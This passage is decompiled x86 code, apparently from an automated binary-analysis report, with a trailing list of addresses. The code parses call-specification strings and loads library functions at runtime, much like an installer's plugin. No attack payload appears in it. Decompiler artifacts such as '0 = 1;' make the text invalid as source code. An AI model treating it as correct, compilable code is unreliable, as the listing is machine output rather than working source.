                                                            								if(_t279 == 0) {
                                                            									goto L144;
                                                            								}
                                                            								__eflags = _t279 != 1;
                                                            								if(_t279 != 1) {
                                                            									goto L154;
                                                            								}
                                                            								goto L143;
                                                            							}
                                                            						}
                                                            						_t371 = _t369 - 1;
                                                            						if(_t371 == 0) {
                                                            							_t282 =  *(_t392 + 0x30);
                                                            							if( *(_t392 + 0x2c) == _t371) {
                                                            								_t282 = _t282 - 1;
                                                            							}
                                                            							 *(_t382 + 0x814) = _t282;
                                                            						}
                                                            						goto L154;
                                                            					}
                                                            					_t335 = _t319 - 0x23;
                                                            					if(_t335 == 0) {
                                                            						_t336 =  *(_t392 + 0x1c);
                                                            						__eflags = _t383 -  *(_t392 + 0x44);
                                                            						if(_t383 <=  *(_t392 + 0x44)) {
                                                            							L29:
                                                            							__eflags =  *(_t392 + 0x28);
                                                            							if( *(_t392 + 0x28) != 0) {
                                                            								L15:
                                                            								_t337 = _t336;
                                                            								__eflags = _t337;
                                                            								if(_t337 == 0) {
                                                            									_t283 =  *((intOrPtr*)(_t392 + 0x13));
                                                            									while(1) {
                                                            										__eflags = _t283 - 0x22;
                                                            										if(_t283 != 0x22) {
                                                            											break;
                                                            										}
                                                            										_t391 = _t391 + 1;
                                                            										__eflags =  *(_t392 + 0x28);
                                                            										_t383 = _t391;
                                                            										if( *(_t392 + 0x28) == 0) {
                                                            											__eflags = 1;
                                                            											 *(_t392 + 0x28) = 1;
                                                            											L121:
                                                            											 *_t312 =  *_t391;
                                                            											_t312 =  &(_t312[1]);
                                                            											goto L155;
                                                            										}
                                                            										_t157 = _t392 + 0x28;
                                                            										 *_t157 =  *(_t392 + 0x28) & 0x00000000;
                                                            										__eflags =  *_t157;
                                                            										_t283 =  *_t391;
                                                            									}
                                                            									__eflags = _t283 - 0x2a;
                                                            									if(_t283 == 0x2a) {
                                                            										_t287 = 2;
                                                            										 *(_t392 + 0x34) = _t287;
                                                            										L129:
                                                            										_t385 =  *(_t392 + 0x14);
                                                            										L130:
                                                            										_t312 = _t385;
                                                            										goto L155;
                                                            									}
                                                            									__eflags = _t283 - 0x2d;
                                                            									if(_t283 == 0x2d) {
                                                            										L117:
                                                            										_t338 =  *_t391;
                                                            										__eflags = _t338 - 0x2d;
                                                            										if(_t338 != 0x2d) {
                                                            											L122:
                                                            											_t162 = _t391 + 1; // 0x1
                                                            											_t288 = _t162;
                                                            											__eflags =  *_t288 - 0x3a;
                                                            											if( *_t288 != 0x3a) {
                                                            												goto L121;
                                                            											}
                                                            											__eflags = _t338 - 0x2d;
                                                            											if(_t338 == 0x2d) {
                                                            												goto L121;
                                                            											}
                                                            											__eflags = 1;
                                                            											 *(_t392 + 0x34) = 1;
                                                            											L125:
                                                            											_t385 =  *(_t392 + 0x14);
                                                            											_t391 = _t288;
                                                            											__eflags = _t312 - _t385;
                                                            											if(_t312 <= _t385) {
                                                            												 *( *(_t392 + 0x38)) = 0;
                                                            											} else {
                                                            												 *_t312 = 0;
                                                            												lstrcpyA( *(_t392 + 0x3c), _t385);
                                                            											}
                                                            											goto L130;
                                                            										}
                                                            										_t159 = _t383 + 1; // 0x1
                                                            										_t288 = _t159;
                                                            										__eflags =  *_t288 - 0x3e;
                                                            										if( *_t288 != 0x3e) {
                                                            											goto L122;
                                                            										}
                                                            										 *(_t392 + 0x34) = 3;
                                                            										goto L125;
                                                            									}
                                                            									__eflags = _t283 - 0x3a;
                                                            									if(_t283 != 0x3a) {
                                                            										goto L121;
                                                            									}
                                                            									goto L117;
                                                            								}
                                                            								_t341 = _t337 - 1;
                                                            								__eflags = _t341;
                                                            								if(_t341 == 0) {
                                                            									_t313 =  *(_t392 + 0x30);
                                                            									L49:
                                                            									_t291 = _t241 + 0xffffffde;
                                                            									__eflags = _t291 - 0x55;
                                                            									if(_t291 > 0x55) {
                                                            										goto L129;
                                                            									}
                                                            									_t76 = _t291 + 0x73c32b1c; // 0x73c3402c
                                                            									switch( *((intOrPtr*)(( *_t76 & 0x000000ff) * 4 +  &M73C32A94))) {
                                                            										case 0:
                                                            											__esi =  *(__esp + 0x14);
                                                            											__ecx =  *(__esp + 0x14);
                                                            											__dl =  *((intOrPtr*)(__esp + 0x13));
                                                            											while(1) {
                                                            												__ebp = __ebp + 1;
                                                            												__al =  *__ebp;
                                                            												__eflags = __al - __dl;
                                                            												if(__al != __dl) {
                                                            													goto L87;
                                                            												}
                                                            												L86:
                                                            												__eflags =  *(__ebp + 1) - __dl;
                                                            												if( *(__ebp + 1) != __dl) {
                                                            													L91:
                                                            													 *__ecx = 0;
                                                            													__esi = E73C312AF(__esi);
                                                            													goto L92;
                                                            												}
                                                            												L87:
                                                            												__eflags = __al;
                                                            												if(__al == 0) {
                                                            													goto L91;
                                                            												}
                                                            												__eflags = __al - __dl;
                                                            												if(__al == __dl) {
                                                            													__ebp = __ebp + 1;
                                                            													__eflags = __ebp;
                                                            												}
                                                            												__al =  *__ebp;
                                                            												 *__ecx =  *__ebp;
                                                            												__ecx = __ecx + 1;
                                                            												__ebp = __ebp + 1;
                                                            												__al =  *__ebp;
                                                            												__eflags = __al - __dl;
                                                            												if(__al != __dl) {
                                                            													goto L87;
                                                            												}
                                                            												goto L86;
                                                            											}
                                                            										case 1:
                                                            											L46:
                                                            											 *(_t392 + 0x18) = 1;
                                                            											goto L129;
                                                            										case 2:
                                                            											 *(__esp + 0x18) =  *(__esp + 0x18) | 0xffffffff;
                                                            											goto L129;
                                                            										case 3:
                                                            											 *(__esp + 0x18) =  *(__esp + 0x18) & 0;
                                                            											__eax = 0;
                                                            											 *(__esp + 0x20) =  *(__esp + 0x20) & 0;
                                                            											__ebx = __ebx + 1;
                                                            											__eax = 1;
                                                            											 *(__esp + 0x30) = __ebx;
                                                            											 *((intOrPtr*)(__esp + 0x2c)) = 1;
                                                            											goto L129;
                                                            										case 4:
                                                            											__eflags =  *(__esp + 0x20);
                                                            											if( *(__esp + 0x20) != 0) {
                                                            												goto L129;
                                                            											}
                                                            											 *(__esp + 0x24) = __ebp;
                                                            											__esi = E73C312C6();
                                                            											__eax = __esp + 0x24;
                                                            											_push(__esi);
                                                            											__eax = E73C31B4C(__eax);
                                                            											_push(__edx);
                                                            											_push(__eax);
                                                            											__eax = E73C3144D(__ecx);
                                                            											__esp = __esp + 0xc;
                                                            											goto L80;
                                                            										case 5:
                                                            											 *(__esp + 0x20) =  *(__esp + 0x20) + 1;
                                                            											goto L129;
                                                            										case 6:
                                                            											_push(7);
                                                            											goto L74;
                                                            										case 7:
                                                            											_push(0x19);
                                                            											goto L101;
                                                            										case 8:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__edx = 1;
                                                            											goto L58;
                                                            										case 9:
                                                            											_push(0x15);
                                                            											goto L101;
                                                            										case 0xa:
                                                            											_push(0x16);
                                                            											goto L101;
                                                            										case 0xb:
                                                            											_push(0x18);
                                                            											goto L101;
                                                            										case 0xc:
                                                            											__eax = 0;
                                                            											__eflags = 0;
                                                            											_t103 = __eax + 1; // 0x1
                                                            											__edx = _t103;
                                                            											goto L69;
                                                            										case 0xd:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__edx = 1;
                                                            											goto L61;
                                                            										case 0xe:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__edx = 1;
                                                            											goto L75;
                                                            										case 0xf:
                                                            											__eax = 0;
                                                            											__eflags = 0;
                                                            											_t105 = __eax + 1; // 0x1
                                                            											__edx = _t105;
                                                            											goto L73;
                                                            										case 0x10:
                                                            											__eax = 0;
                                                            											__eflags = 0;
                                                            											_t100 = __eax + 1; // 0x1
                                                            											__edx = _t100;
                                                            											goto L65;
                                                            										case 0x11:
                                                            											_push(3);
                                                            											goto L74;
                                                            										case 0x12:
                                                            											_push(0x17);
                                                            											L101:
                                                            											_pop(__esi);
                                                            											goto L102;
                                                            										case 0x13:
                                                            											__eax = __esp + 0x24;
                                                            											__eax = E73C31B4C(__esp + 0x24);
                                                            											_push(0xb);
                                                            											_pop(__esi);
                                                            											_t134 = __eax + 1; // 0x1
                                                            											__ecx = _t134;
                                                            											__eflags = _t134 - __esi;
                                                            											_push(1);
                                                            											_pop(__ecx);
                                                            											__esi =  >=  ? _t134 : __esi;
                                                            											__esi = __eax + __esi;
                                                            											__eflags = __esi;
                                                            											L80:
                                                            											__ebp =  *(__esp + 0x24);
                                                            											goto L93;
                                                            										case 0x14:
                                                            											__esi = __esi | 0xffffffff;
                                                            											goto L102;
                                                            										case 0x15:
                                                            											 *((intOrPtr*)(__esp + 0x3c)) =  *((intOrPtr*)(__esp + 0x3c)) + 1;
                                                            											_push(3);
                                                            											goto L74;
                                                            										case 0x16:
                                                            											__eax = 0;
                                                            											goto L75;
                                                            										case 0x17:
                                                            											__eax = 0;
                                                            											__eflags = 0;
                                                            											_t104 = __eax + 1; // 0x1
                                                            											__edx = _t104;
                                                            											goto L71;
                                                            										case 0x18:
                                                            											_t342 =  *(_t382 + 0x814);
                                                            											__eflags = _t342 - _t313;
                                                            											_push(1);
                                                            											_t294 =  <=  ? _t313 : _t342;
                                                            											 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0;
                                                            											 *(_t392 + 0x24) =  *(_t392 + 0x24) & 0;
                                                            											_t314 =  <=  ? _t313 : _t342;
                                                            											__eflags =  *(_t392 + 0x38) - 3;
                                                            											 *(_t392 + 0x34) =  <=  ? _t313 : _t342;
                                                            											__eflags = _t342 - (0 |  *(_t392 + 0x38) == 0x00000003);
                                                            											_pop(_t297);
                                                            											_t374 =  !=  ? _t297 :  *(_t392 + 0x30);
                                                            											 *(_t392 + 0x2c) =  !=  ? _t297 :  *(_t392 + 0x30);
                                                            											goto L129;
                                                            										case 0x19:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__eflags = 1;
                                                            											L58:
                                                            											_push(2);
                                                            											_pop(__ecx);
                                                            											 *(__esp + 0x18) = __ecx;
                                                            											goto L75;
                                                            										case 0x1a:
                                                            											L69:
                                                            											_push(5);
                                                            											goto L74;
                                                            										case 0x1b:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__eflags = 1;
                                                            											L61:
                                                            											_push(3);
                                                            											_pop(__esi);
                                                            											 *(__esp + 0x18) = __esi;
                                                            											goto L75;
                                                            										case 0x1c:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											goto L75;
                                                            										case 0x1d:
                                                            											L73:
                                                            											_push(6);
                                                            											goto L74;
                                                            										case 0x1e:
                                                            											L65:
                                                            											_push(2);
                                                            											goto L74;
                                                            										case 0x1f:
                                                            											__eax = __esp + 0x24;
                                                            											__eax = E73C31B4C(__esp + 0x24);
                                                            											__ebp =  *(__esp + 0x28);
                                                            											_t138 = __eax + 1; // 0x1
                                                            											__esi = _t138;
                                                            											L92:
                                                            											_pop(__ecx);
                                                            											L93:
                                                            											__eflags = __esi;
                                                            											if(__esi == 0) {
                                                            												goto L129;
                                                            											}
                                                            											L102:
                                                            											__ecx =  *(__esp + 0x20);
                                                            											0 = 1;
                                                            											 *((intOrPtr*)(__esp + 0x2c)) = 1;
                                                            											__eflags = __ecx;
                                                            											if(__ecx != 0) {
                                                            												__eflags = __ecx - 1;
                                                            												if(__ecx == 1) {
                                                            													__eax = __ebx;
                                                            													__eax = __ebx << 5;
                                                            													__eflags = __eax;
                                                            													 *(__eax + __edi + 0x82c) = __esi;
                                                            												}
                                                            												L109:
                                                            												 *(__esp + 0x20) = __ecx;
                                                            												goto L129;
                                                            											}
                                                            											__ebx = __ebx << 5;
                                                            											__eax =  *(__ebx + __edi + 0x830);
                                                            											__eflags = __eax - 0xffffffff;
                                                            											if(__eax <= 0xffffffff) {
                                                            												L105:
                                                            												__eax = GlobalFree(__eax);
                                                            												__ecx =  *(__esp + 0x20);
                                                            												L106:
                                                            												 *(__ebx + __edi + 0x830) = __esi;
                                                            												goto L109;
                                                            											}
                                                            											__eflags = __eax - 0x19;
                                                            											if(__eax <= 0x19) {
                                                            												goto L106;
                                                            											}
                                                            											goto L105;
                                                            										case 0x20:
                                                            											L71:
                                                            											_push(4);
                                                            											L74:
                                                            											_pop(__eax);
                                                            											L75:
                                                            											__ecx =  *(0x73c34090 + __eax * 4);
                                                            											__esi = __ebx;
                                                            											__esi = __ebx << 5;
                                                            											__edx =  ~__edx;
                                                            											_push(1);
                                                            											asm("sbb edx, edx");
                                                            											 *(__esp + 0x30) = 1;
                                                            											__edx = __edx & 0x00008000;
                                                            											__edx = __edx | __eax;
                                                            											0 = 1;
                                                            											 *(__esi + __edi + 0x818) = __edx;
                                                            											__edx =  *(__esp + 0x1c);
                                                            											__eflags = __ecx;
                                                            											__eax =  >  ? __ecx : 1;
                                                            											__eflags = __edx;
                                                            											_pop(__ecx);
                                                            											__eax =  <  ? __ecx :  >  ? __ecx : 1;
                                                            											 *((intOrPtr*)(__esi + __edi + 0x828)) =  <  ? __ecx :  >  ? __ecx : 1;
                                                            											__eflags = __edx - __ecx;
                                                            											if(__edx == __ecx) {
                                                            												__eax = __esp + 0x24;
                                                            												__eax = E73C31B4C(__esp + 0x24);
                                                            												__ebp =  *(__esp + 0x28);
                                                            												_t116 = __eax + 1; // 0x1
                                                            												__edx = _t116;
                                                            												 *(__esp + 0x18) = __edx;
                                                            											}
                                                            											 *(__esi + __edi + 0x830) =  *(__esi + __edi + 0x830) & 0x00000000;
                                                            											__ecx = __ebx + 0x41;
                                                            											__ecx = __ebx + 0x41 << 5;
                                                            											 *(__esi + __edi + 0x81c) = __edx;
                                                            											 *((__ebx + 0x41 << 5) + __edi) =  *((__ebx + 0x41 << 5) + __edi) & 0x00000000;
                                                            											 *(__esi + __edi + 0x82c) =  *(__esi + __edi + 0x82c) & 0x00000000;
                                                            											goto L129;
                                                            										case 0x21:
                                                            											goto L129;
                                                            									}
                                                            								}
                                                            								_t343 = _t341 - 1;
                                                            								__eflags = _t343;
                                                            								if(_t343 == 0) {
                                                            									_t313 = 0;
                                                            									 *(_t392 + 0x30) = 0;
                                                            									goto L49;
                                                            								}
                                                            								__eflags = _t343 != 1;
                                                            								if(_t343 != 1) {
                                                            									goto L121;
                                                            								}
                                                            								__eflags = _t241 - 0x6e;
                                                            								if(__eflags > 0) {
                                                            									_t298 = _t241 - 0x72;
                                                            									__eflags = _t298;
                                                            									if(_t298 == 0) {
                                                            										_push(4);
                                                            										L41:
                                                            										_pop(_t299);
                                                            										L42:
                                                            										_t345 =  *(_t382 + 0x810);
                                                            										__eflags =  *(_t392 + 0x18) - 1;
                                                            										if( *(_t392 + 0x18) != 1) {
                                                            											_t346 = _t345 &  !_t299;
                                                            											__eflags = _t346;
                                                            										} else {
                                                            											_t346 = _t345 | _t299;
                                                            										}
                                                            										 *(_t382 + 0x810) = _t346;
                                                            										goto L46;
                                                            									}
                                                            									_t303 = _t298 - 1;
                                                            									__eflags = _t303;
                                                            									if(_t303 == 0) {
                                                            										_push(0x10);
                                                            										goto L41;
                                                            									}
                                                            									_t347 = 2;
                                                            									__eflags = _t303 != _t347;
                                                            									if(_t303 != _t347) {
                                                            										goto L129;
                                                            									}
                                                            									_push(0x40);
                                                            									goto L41;
                                                            								}
                                                            								if(__eflags == 0) {
                                                            									_push(8);
                                                            									goto L41;
                                                            								}
                                                            								_t305 = _t241 - 0x21;
                                                            								__eflags = _t305;
                                                            								if(_t305 == 0) {
                                                            									 *(_t392 + 0x18) =  ~( *(_t392 + 0x18));
                                                            									goto L129;
                                                            								}
                                                            								_t306 = _t305 - 0x11;
                                                            								__eflags = _t306;
                                                            								if(_t306 == 0) {
                                                            									_t299 = 0x100;
                                                            									goto L42;
                                                            								}
                                                            								_t307 = _t306 - 0x31;
                                                            								__eflags = _t307;
                                                            								if(_t307 == 0) {
                                                            									_t299 = 1;
                                                            									goto L42;
                                                            								}
                                                            								_t348 = 2;
                                                            								__eflags = _t307 != _t348;
                                                            								if(_t307 != _t348) {
                                                            									goto L129;
                                                            								} else {
                                                            									_push(0x20);
                                                            									goto L41;
                                                            								}
                                                            							}
                                                            							 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0x00000000;
                                                            							 *(_t392 + 0x34) =  *(_t392 + 0x34) & 0x00000000;
                                                            							goto L132;
                                                            						}
                                                            						__eflags =  *((char*)(_t391 - 1)) - 0x3a;
                                                            						if( *((char*)(_t391 - 1)) != 0x3a) {
                                                            							goto L29;
                                                            						}
                                                            						__eflags = _t336;
                                                            						if(_t336 == 0) {
                                                            							goto L15;
                                                            						}
                                                            						goto L29;
                                                            					}
                                                            					_t349 = _t335 - 5;
                                                            					if(_t349 == 0) {
                                                            						__eflags =  *(_t392 + 0x28);
                                                            						if( *(_t392 + 0x28) == 0) {
                                                            							 *(_t392 + 0x1c) = 1;
                                                            							__eflags =  *(_t392 + 0x34) - 3;
                                                            							_t360 = (0 |  *(_t392 + 0x34) == 0x00000003) + 1;
                                                            							__eflags = _t360;
                                                            							 *(_t392 + 0x30) = _t360;
                                                            						}
                                                            						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
                                                            						_t377 =  *(_t392 + 0x28);
                                                            						__eflags = _t377;
                                                            						_t351 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
                                                            						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
                                                            						 *(_t392 + 0x2c) =  *(_t392 + 0x2c) & 0x00000000;
                                                            						__eflags = _t377;
                                                            						_t353 =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
                                                            						 *(_t392 + 0x2c) =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
                                                            						__eflags = _t377;
                                                            						_t355 = 0 | _t377 == 0x00000000;
                                                            						 *(_t392 + 0x20) =  *(_t392 + 0x20) & 0x00000000;
                                                            						__eflags =  *(_t392 + 0x28);
                                                            						_t379 =  ==  ?  *(_t392 + 0x20) :  *(_t392 + 0x20);
                                                            						L13:
                                                            						 *(_t392 + 0x20) = _t379;
                                                            						_t368 =  *(_t392 + 0x40);
                                                            						__eflags = _t355;
                                                            						if(_t355 != 0) {
                                                            							goto L132;
                                                            						}
                                                            						L14:
                                                            						_t336 =  *(_t392 + 0x1c);
                                                            						goto L15;
                                                            					}
                                                            					_t361 = _t349 - 1;
                                                            					if(_t361 == 0) {
                                                            						_t380 =  *(_t392 + 0x28);
                                                            						__eflags = _t380;
                                                            						_t363 =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
                                                            						 *(_t392 + 0x1c) =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
                                                            						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
                                                            						__eflags = _t380;
                                                            						_t365 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
                                                            						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
                                                            						__eflags = _t380;
                                                            						_t355 = 0 | _t380 == 0x00000000;
                                                            						 *(_t392 + 0x20) =  *(_t392 + 0x20) & 0x00000000;
                                                            						__eflags =  *(_t392 + 0x28);
                                                            						_t379 =  ==  ?  *(_t392 + 0x20) :  *(_t392 + 0x20);
                                                            						goto L13;
                                                            					}
                                                            					if(_t361 != 0x16) {
                                                            						goto L14;
                                                            					} else {
                                                            						 *(_t392 + 0x1c) = 3;
                                                            						 *(_t392 + 0x18) = 1;
                                                            						goto L132;
                                                            					}
                                                            				}
                                                            				GlobalFree( *(_t392 + 0x44));
                                                            				GlobalFree( *(_t392 + 0x14));
                                                            				GlobalFree( *(_t392 + 0x38));
                                                            				if(_t382 == 0 ||  *(_t382 + 0x80c) != 0) {
                                                            					L181:
                                                            					return _t382;
                                                            				} else {
                                                            					_t249 =  *_t382 - 1;
                                                            					if(_t249 == 0) {
                                                            						_t215 = _t382 + 8; // 0x8
                                                            						_t386 = _t215;
                                                            						__eflags =  *_t386;
                                                            						if( *_t386 != 0) {
                                                            							_t250 = GetModuleHandleA(_t386);
                                                            							 *(_t382 + 0x808) = _t250;
                                                            							__eflags = _t250;
                                                            							if(_t250 != 0) {
                                                            								L169:
                                                            								_t220 = _t382 + 0x408; // 0x408
                                                            								_t387 = _t220;
                                                            								_t251 = E73C31ECE(_t250, _t387);
                                                            								 *(_t382 + 0x80c) = _t251;
                                                            								__eflags = _t251;
                                                            								if(_t251 == 0) {
                                                            									__eflags =  *_t387 - 0x23;
                                                            									if( *_t387 == 0x23) {
                                                            										_t222 = _t382 + 0x409; // 0x409
                                                            										_t255 = E73C31326();
                                                            										__eflags = _t255;
                                                            										if(_t255 != 0) {
                                                            											__eflags = _t255 & 0xffff0000;
                                                            											if((_t255 & 0xffff0000) == 0) {
                                                            												 *(_t382 + 0x80c) = GetProcAddress( *(_t382 + 0x808), _t255 & 0x0000ffff);
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            								__eflags =  *(_t392 + 0x3c);
                                                            								if( *(_t392 + 0x3c) != 0) {
                                                            									L176:
                                                            									_t252 = lstrlenA(_t387);
                                                            									_t323 = 0x41;
                                                            									_t387[_t252] = _t323;
                                                            									_t253 = E73C31ECE( *(_t382 + 0x808), _t387);
                                                            									__eflags = _t253;
                                                            									if(_t253 == 0) {
                                                            										__eflags =  *(_t382 + 0x80c);
                                                            										L179:
                                                            										if(__eflags != 0) {
                                                            											goto L181;
                                                            										}
                                                            										L180:
                                                            										_t233 = _t382 + 4;
                                                            										 *_t233 =  *(_t382 + 4) | 0xffffffff;
                                                            										__eflags =  *_t233;
                                                            										goto L181;
                                                            									}
                                                            									L177:
                                                            									 *(_t382 + 0x80c) = _t253;
                                                            									goto L181;
                                                            								} else {
                                                            									__eflags =  *(_t382 + 0x80c);
                                                            									if( *(_t382 + 0x80c) != 0) {
                                                            										goto L181;
                                                            									}
                                                            									goto L176;
                                                            								}
                                                            							}
                                                            							_t250 = LoadLibraryA(_t386);
                                                            							 *(_t382 + 0x808) = _t250;
                                                            							__eflags = _t250;
                                                            							if(_t250 == 0) {
                                                            								goto L180;
                                                            							}
                                                            							goto L169;
                                                            						}
                                                            						_t216 = _t382 + 0x408; // 0x408
                                                            						_t259 = E73C31326();
                                                            						 *(_t382 + 0x80c) = _t259;
                                                            						__eflags = _t259;
                                                            						goto L179;
                                                            					}
                                                            					_t260 = _t249 - 1;
                                                            					if(_t260 == 0) {
                                                            						_t214 = _t382 + 0x408; // 0x408
                                                            						_t261 = _t214;
                                                            						__eflags =  *_t261;
                                                            						if( *_t261 == 0) {
                                                            							goto L181;
                                                            						}
                                                            						_push(_t261);
                                                            						_t253 = E73C31326();
                                                            						goto L177;
                                                            					}
                                                            					if(_t260 != 1) {
                                                            						goto L181;
                                                            					}
                                                            					_t202 = _t382 + 8; // 0x8
                                                            					_t317 = _t202;
                                                            					_push(_t202);
                                                            					_t388 = E73C31326();
                                                            					 *(_t382 + 0x808) = _t388;
                                                            					if(_t388 == 0) {
                                                            						goto L180;
                                                            					}
                                                            					 *(_t382 + 0x84c) =  *(_t382 + 0x84c) & 0x00000000;
                                                            					_t264 = E73C312AF(_t317);
                                                            					 *(_t382 + 0x83c) =  *(_t382 + 0x83c) & 0x00000000;
                                                            					 *((intOrPtr*)(_t382 + 0x850)) = _t264;
                                                            					 *((intOrPtr*)(_t382 + 0x848)) = 1;
                                                            					 *((intOrPtr*)(_t382 + 0x838)) = 1;
                                                            					_t211 = _t382 + 0x408; // 0x408
                                                            					_t253 =  *(_t388->i + E73C31326() * 4);
                                                            					goto L177;
                                                            				}
                                                            			}










































































                                                            0x73c32687
                                                            0x73c3268b
                                                            0x73c3268d
                                                            0x73c32693
                                                            0x73c32694
                                                            0x73c32695
                                                            0x73c3269a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32634
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32549
                                                            0x00000000
                                                            0x00000000
                                                            0x73c326f2
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32551
                                                            0x73c32553
                                                            0x73c32554
                                                            0x00000000
                                                            0x00000000
                                                            0x73c326e2
                                                            0x00000000
                                                            0x00000000
                                                            0x73c326e6
                                                            0x00000000
                                                            0x00000000
                                                            0x73c326ee
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32598
                                                            0x73c32598
                                                            0x73c3259a
                                                            0x73c3259a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32564
                                                            0x73c32566
                                                            0x73c32567
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32577
                                                            0x73c32579
                                                            0x73c3257a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c325aa
                                                            0x73c325aa
                                                            0x73c325ac
                                                            0x73c325ac
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32583
                                                            0x73c32583
                                                            0x73c32585
                                                            0x73c32585
                                                            0x00000000
                                                            0x00000000
                                                            0x73c3258c
                                                            0x00000000
                                                            0x00000000
                                                            0x73c326ea
                                                            0x73c326f4
                                                            0x73c326f4
                                                            0x00000000
                                                            0x00000000
                                                            0x73c3263d
                                                            0x73c32642
                                                            0x73c32648
                                                            0x73c3264a
                                                            0x73c3264b
                                                            0x73c3264b
                                                            0x73c3264e
                                                            0x73c32650
                                                            0x73c32652
                                                            0x73c32653
                                                            0x73c32656
                                                            0x73c32656
                                                            0x73c32658
                                                            0x73c32658
                                                            0x00000000
                                                            0x00000000
                                                            0x73c326dd
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32590
                                                            0x73c32594
                                                            0x00000000
                                                            0x00000000
                                                            0x73c3254d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c325a1
                                                            0x73c325a1
                                                            0x73c325a3
                                                            0x73c325a3
                                                            0x00000000
                                                            0x00000000
                                                            0x73c324ec
                                                            0x73c324f4
                                                            0x73c324f6
                                                            0x73c324f8
                                                            0x73c324fb
                                                            0x73c324ff
                                                            0x73c32503
                                                            0x73c3250b
                                                            0x73c32510
                                                            0x73c32517
                                                            0x73c32519
                                                            0x73c3251a
                                                            0x73c3251d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32558
                                                            0x73c3255a
                                                            0x73c3255a
                                                            0x73c3255b
                                                            0x73c3255b
                                                            0x73c3255d
                                                            0x73c3255e
                                                            0x00000000
                                                            0x00000000
                                                            0x73c3259d
                                                            0x73c3259d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c3256b
                                                            0x73c3256d
                                                            0x73c3256d
                                                            0x73c3256e
                                                            0x73c3256e
                                                            0x73c32570
                                                            0x73c32571
                                                            0x00000000
                                                            0x00000000
                                                            0x73c3257e
                                                            0x73c32580
                                                            0x00000000
                                                            0x00000000
                                                            0x73c325af
                                                            0x73c325af
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32588
                                                            0x73c32588
                                                            0x00000000
                                                            0x00000000
                                                            0x73c3265e
                                                            0x73c32663
                                                            0x73c32668
                                                            0x73c3266c
                                                            0x73c3266c
                                                            0x73c326d2
                                                            0x73c326d2
                                                            0x73c326d3
                                                            0x73c326d3
                                                            0x73c326d5
                                                            0x00000000
                                                            0x00000000
                                                            0x73c326f5
                                                            0x73c326f5
                                                            0x73c326fb
                                                            0x73c326fc
                                                            0x73c32700
                                                            0x73c32702
                                                            0x73c3272c
                                                            0x73c3272e
                                                            0x73c32730
                                                            0x73c32732
                                                            0x73c32732
                                                            0x73c32735
                                                            0x73c32735
                                                            0x73c3273c
                                                            0x73c3273d
                                                            0x00000000
                                                            0x73c3273d
                                                            0x73c32704
                                                            0x73c32707
                                                            0x73c3270e
                                                            0x73c32711
                                                            0x73c32718
                                                            0x73c32719
                                                            0x73c3271f
                                                            0x73c32723
                                                            0x73c32723
                                                            0x00000000
                                                            0x73c32723
                                                            0x73c32713
                                                            0x73c32716
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c325a6
                                                            0x73c325a6
                                                            0x73c325b1
                                                            0x73c325b1
                                                            0x73c325b2
                                                            0x73c325b2
                                                            0x73c325b9
                                                            0x73c325bb
                                                            0x73c325be
                                                            0x73c325c0
                                                            0x73c325c2
                                                            0x73c325c4
                                                            0x73c325cc
                                                            0x73c325d2
                                                            0x73c325d6
                                                            0x73c325d7
                                                            0x73c325de
                                                            0x73c325e2
                                                            0x73c325e4
                                                            0x73c325e7
                                                            0x73c325e9
                                                            0x73c325ea
                                                            0x73c325ed
                                                            0x73c325f4
                                                            0x73c325f6
                                                            0x73c325f8
                                                            0x73c325fd
                                                            0x73c32602
                                                            0x73c32607
                                                            0x73c32607
                                                            0x73c3260a
                                                            0x73c3260a
                                                            0x73c3260e
                                                            0x73c32616
                                                            0x73c32619
                                                            0x73c3261c
                                                            0x73c32623
                                                            0x73c32627
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c324e5
                                                            0x73c32401
                                                            0x73c32401
                                                            0x73c32404
                                                            0x73c324c4
                                                            0x73c324c6
                                                            0x00000000
                                                            0x73c324c6
                                                            0x73c3240a
                                                            0x73c3240d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32413
                                                            0x73c32416
                                                            0x73c3247b
                                                            0x73c3247b
                                                            0x73c3247e
                                                            0x73c32498
                                                            0x73c3249a
                                                            0x73c3249a
                                                            0x73c3249b
                                                            0x73c3249b
                                                            0x73c324a4
                                                            0x73c324a8
                                                            0x73c324b0
                                                            0x73c324b0
                                                            0x73c324aa
                                                            0x73c324aa
                                                            0x73c324aa
                                                            0x73c324b2
                                                            0x00000000
                                                            0x73c324b2
                                                            0x73c32480
                                                            0x73c32480
                                                            0x73c32483
                                                            0x73c32494
                                                            0x00000000
                                                            0x73c32494
                                                            0x73c32487
                                                            0x73c32488
                                                            0x73c3248a
                                                            0x00000000
